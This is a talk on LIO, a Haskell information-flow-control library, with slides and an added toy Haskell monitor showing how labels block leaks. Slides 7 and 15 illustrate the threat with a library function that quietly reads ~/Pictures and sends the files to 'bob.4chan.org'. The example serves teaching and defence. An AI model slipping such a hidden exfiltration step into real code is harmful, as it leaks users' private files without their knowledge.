Building secure systems with LIO Deian Stefan, Amit Levy, Alejandro - - PowerPoint PPT Presentation

SLIDE 1

Building secure systems with LIO

Deian Stefan, Amit Levy, Alejandro Russo and David Mazières

SLIDE 2

Building systems is hard.

SLIDE 3

Building secure systems is harder.

if ((err = SSLHashSHA1.upda
    goto fail;
if ((err = SSLHashSHA1.upda
    goto fail;
    goto fail;
if ((err = SSLHashSHA1.fina
    goto fail;

SLIDE 4

Safe Haskell to the rescue!

SLIDE 5

Kind of…

SLIDE 6

cabal install your-cool-lib

SLIDE 7

{-# LANGUAGE Safe #-}
module YourCoolLib where
...
renderPDF :: Text -> IO PDF
renderPDF txt = do
  pics <- readFiles "~/Pictures"
  sendFiles pics "bob.4chan.org"
  _renderPDF txt
  ...

SLIDE 9

But, I don’t execute untrusted code!

SLIDE 10

You do: 83% of CVEs are in application code

SLIDE 11

Should treat most of your code as untrusted ➠ address one problem!

SLIDE 12

Safely executing untrusted code

  • Approach: information flow control (IFC)

    ➤ Associate security policy with data
    ➤ Enforce that all code abides by data policy

  • Result: data confidentiality and integrity

SLIDE 13

Policy specification with DCLabels (demo)

SLIDE 15

{-# LANGUAGE Safe #-}
module YourCoolLib where
...
renderPDF :: Text -> LIO PDF
renderPDF txt = do
  pics <- readFiles "~/Pictures"
  sendFiles pics "bob.4chan.org"
  _renderPDF txt

alice canFlowTo bob.4chan.org?

SLIDE 16

Enforcement with simplified LIO (demo)

SLIDE 17

But real apps require some form of information release…

SLIDE 18

{-# LANGUAGE Safe #-}
module ICloudLib where
...
backup :: DCPriv -> LIO ()
backup alicePriv = do
  pics <- readFiles "~/Pictures"
  sendFilesP alicePriv pics "upload.icloud.com"
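
The flow check from the renderPDF slides and the privileged release in backup, as an added example that is not from the slides or the lio library: a toy, secrecy-only monitor in which a label is just the list of principals whose secrets the data contains (real DCLabels are richer). The names readLabeled, sendP and canFlowToP are hypothetical stand-ins, and the empty label is assumed to mean "public network".

```haskell
-- Toy model of a floating-label IFC monitor; not the lio library's code.
module Main where

import Data.List (union, (\\))

type Principal = String
type Label = [Principal]   -- principals whose secrets the data contains
type Priv  = [Principal]   -- principals the running code may speak for

-- l1 may flow to l2 only if l2 is at least as secret as l1.
canFlowTo :: Label -> Label -> Bool
canFlowTo l1 l2 = null (l1 \\ l2)

-- With privileges, the owned principals are discounted before the check.
canFlowToP :: Priv -> Label -> Label -> Bool
canFlowToP p l1 l2 = canFlowTo (l1 \\ p) l2

-- A computation threads the current label and may stop with an IFC error.
newtype LIO a = LIO { runLIO :: Label -> Either String (a, Label) }

instance Functor LIO where
  fmap f (LIO m) = LIO $ \l -> fmap (\(a, l') -> (f a, l')) (m l)
instance Applicative LIO where
  pure a = LIO $ \l -> Right (a, l)
  LIO f <*> LIO m = LIO $ \l -> do
    (g, l1) <- f l
    (a, l2) <- m l1
    pure (g a, l2)
instance Monad LIO where
  LIO m >>= k = LIO $ \l -> m l >>= \(a, l') -> runLIO (k a) l'

-- Reading labeled data raises (taints) the current label.
readLabeled :: Label -> a -> LIO a
readLabeled dl a = LIO $ \l -> Right (a, l `union` dl)

-- A write succeeds only if the current label can flow to the sink's label.
sendP :: Priv -> Label -> String -> LIO ()
sendP p sink host = LIO $ \l ->
  if canFlowToP p l sink then Right ((), l)
  else Left ("IFC violation: " ++ show l ++ " cannot flow to " ++ host)

-- renderPDF holds no privilege; backup holds alice's privilege.
renderPDF, backup :: LIO ()
renderPDF = readLabeled ["alice"] "pics" >>= \_ -> sendP [] [] "bob.4chan.org"
backup    = readLabeled ["alice"] "pics" >>= \_ -> sendP ["alice"] [] "upload.icloud.com"

main :: IO ()
main = do
  print (fmap fst (runLIO renderPDF []))
  print (fmap fst (runLIO backup []))
```

The only difference between the two calls is the privilege passed to sendP, which is why the later slides stress keeping privilege use small and easy to audit.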

SLIDE 20

Other LIO features

  • LIORefs, LChans, LMVars, etc.
  • Threads
  • Exceptions
  • File system
  • Database system
  • HTTP server & client

…port your own!

SLIDE 22

Challenge: policy specification

  • LIO ensures that code cannot violate IFC
  • DCLabels is a simple label model
  • But to ensure security, still must:

    ➤ Set the correct policy
    ➤ Structure app code to minimize use of privileges

… this is hard, but we have some ideas!

SLIDE 23

We built multiple systems…

  • LearnByHacking - School of Haskell clone
  • GitStar - GitHub platform clone
  • LambdaChair - Conference review system
  • Blog, wiki, auth server, commenting system, …

give it a shot!

cabal install lio

www.labeled.io